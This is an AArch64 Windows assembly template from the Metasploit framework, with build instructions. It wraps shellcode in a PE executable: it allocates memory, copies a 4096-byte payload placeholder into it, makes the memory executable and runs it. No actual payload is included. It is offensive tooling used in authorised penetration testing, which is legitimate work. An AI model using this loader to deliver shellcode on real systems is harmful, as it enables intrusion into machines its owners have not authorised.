Path: blob/master/data/templates/src/pe/exe/template_aarch64_windows.asm
19845 views
;1; A minimal AArch64 PE template for Metasploit shellcode2; Author: Alexander 'xaitax' Hagenah3;4; --- Compilation (Microsoft Visual Studio Build Tools) ---5; 1. Assemble:6; armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm7;8; 2. Link:9; LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe10;11;12; --- Cross Compilation (Microsoft Visual Studio Build Tools) ---13; 1. Locate Cross Compiler Tools and Libraries14; In this case: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\15; And: C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm6416; 2. Assemble:17; "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\armasm64.exe" -o template_aarch64_windows.obj template_aarch64_windows.asm18; 3. Link:19; "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\link.exe" template_aarch64_windows.obj /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64" /MACHINE:ARM64 /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe20AREA |.text|, CODE, READONLY2122; Import the Win32 functions we need from kernel32.dll23IMPORT VirtualAlloc24IMPORT VirtualProtect25IMPORT ExitProcess2627; Define constants for Win32 API calls28SCSIZE EQU 409629MEM_COMMIT EQU 0x100030PAGE_READWRITE EQU 0x0431PAGE_EXECUTE EQU 0x103233; Export the entry point of our program34EXPORT main3536main37; Allocate space on the stack for the oldProtection variable (DWORD)38sub sp, sp, #163940; --- 1. Allocate executable memory ---41; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE);42mov x0, #043mov x1, #SCSIZE44mov x2, #MEM_COMMIT45mov x3, #PAGE_READWRITE46ldr x8, =VirtualAlloc47blr x84849; Check if VirtualAlloc failed. If so, exit.50cbz x0, exit_fail5152; Save the pointer to our new executable buffer in a non-volatile register53mov x19, x05455; --- 2. Copy the payload into the new buffer ---56; This is a simple memcpy(dest, src, size)57mov x0, x19 ; x0 = dest = our new buffer58ldr x1, =payload_buffer ; x1 = src = the payload in our .data section59mov x2, #SCSIZE ; x2 = count60copy_loop61ldrb w3, [x1], #1 ; Load byte from src, increment src pointer62strb w3, [x0], #1 ; Store byte to dest, increment dest pointer63subs x2, x2, #1 ; Decrement counter64b.ne copy_loop ; Loop if not zero6566; --- 3. Change memory permissions to executable ---67; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect);68mov x0, x19 ; x0 = buffer address69mov x1, #SCSIZE ; x1 = size70mov x2, #PAGE_EXECUTE ; x2 = new protection71mov x3, sp ; x3 = pointer to oldProtection on the stack72ldr x8, =VirtualProtect73blr x87475; --- 4. Execute the payload ---76; Jump to the shellcode we just copied and protected.77blr x197879exit_success80; Shellcode returned, or we are done. Exit cleanly.81mov x0, #0 ; Exit code 082ldr x8, =ExitProcess83blr x88485exit_fail86; Something went wrong. Exit with code 1.87mov x0, #188ldr x8, =ExitProcess89blr x89091; The data section where the payload will be located.92; The 'PAYLOAD:' tag must be at the very beginning of this buffer.93payload_buffer94DCB "PAYLOAD:"95SPACE SCSIZE - 8 ; Reserve the rest of the 4096 bytes9697END9899100